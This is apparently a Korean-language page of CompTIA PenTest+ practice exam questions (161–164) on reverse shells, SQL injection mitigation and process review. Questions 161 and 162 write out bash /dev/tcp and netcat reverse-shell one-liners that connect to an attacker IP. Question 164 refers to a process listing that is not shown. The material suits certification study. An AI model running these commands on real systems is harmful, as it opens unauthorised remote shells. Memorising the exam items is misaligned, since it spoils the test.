무료 온라인 액세스 CompTIA.PT0-001.v2022-06-01.q170 모의 시험 (Page 34)

PT0-001 문제 161

악용된 시스템의 히스토리 파일에서 다음 행이 발견되었습니다. 공격자는 다음 명령을 실행했습니다.
bash -i >& /dev/tcp/192.168.0.1/80 0> &1
다음 중 명령이 수행하는 작업을 설명하는 것은 무엇입니까?

A. 웹 서버의 배너를 가져옵니다.

B. 포트 스캔을 수행합니다.

C. 제공된 IP에 대한 오류 로그를 제거합니다.

D. TTY를 원격 시스템으로 리디렉션합니다.

PT0-001 문제 162

웹 애플리케이션 평가 중에 침투 테스터는 서버에서 임의의 명령을 실행할 수 있음을 발견합니다. 이 공격을 한 단계 더 발전시키기 위해 침투 테스터는 192.168.1.5에서 공격 기계에 역방향 쉘을 다시 얻는 방법을 탐색하기 시작합니다. 다음 중 가능한 방법은 무엇입니까? (2개 선택).

A. nc 192.168.1.5 44444

B. nc -nlvp 44444 -e /bin/sh

C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f

D. nc -e /bin/sh 192.168.1.5 44444

E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 444444>/tmp/f

F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.1 44444>/tmp/f

PT0-001 문제 163

최근에 체결된 침투 테스트에 따르면 레거시 웹 애플리케이션이 SQL 주입에 취약하다는 연구 결과에 따르면 취약점을 완전히 수정하려면 아키텍처 변경이 필요하며 이해 관계자는 애플리케이션의 가용성을 위험에 빠뜨릴 수 있는 위치에 있지 않습니다. 다음 제어는 SQL 주입 위험을 최소화하기 위한 저노력, 단기 솔루션입니까? (2개 선택).

A. SQL 문에 블랙리스트 접근 방식을 사용합니다.

B. 코드에서 인라인 SQL 문을 식별하고 제거합니다.

C. 악성 입력의 출처를 식별하고 해당 IP 주소를 차단합니다.

D. 모든 사용자 입력을 식별하고 삭제합니다.

E. 저장 프로시저에서 동적 SQL을 식별하고 제거합니다.

F. SQL 문에 화이트리스트 접근 방식을 사용합니다.

PT0-001 문제 164

침투 테스터는 실행 중인 프로세스 목록을 수집하기 위해 프로덕션 웹 서버에서 실행 중인 호스트 기반 취약성 관리 에이전트에 대한 보고서를 생성합니다. 테스터는 다음 정보를 수신합니다.

다음 프로세스 중 모범 사례의 부족을 가장 잘 나타내는 것은 무엇입니까?

A. dbus-데몬

B. 시스템

C. urlgrabber-ext

D. 아파치2

PT0-001 문제 165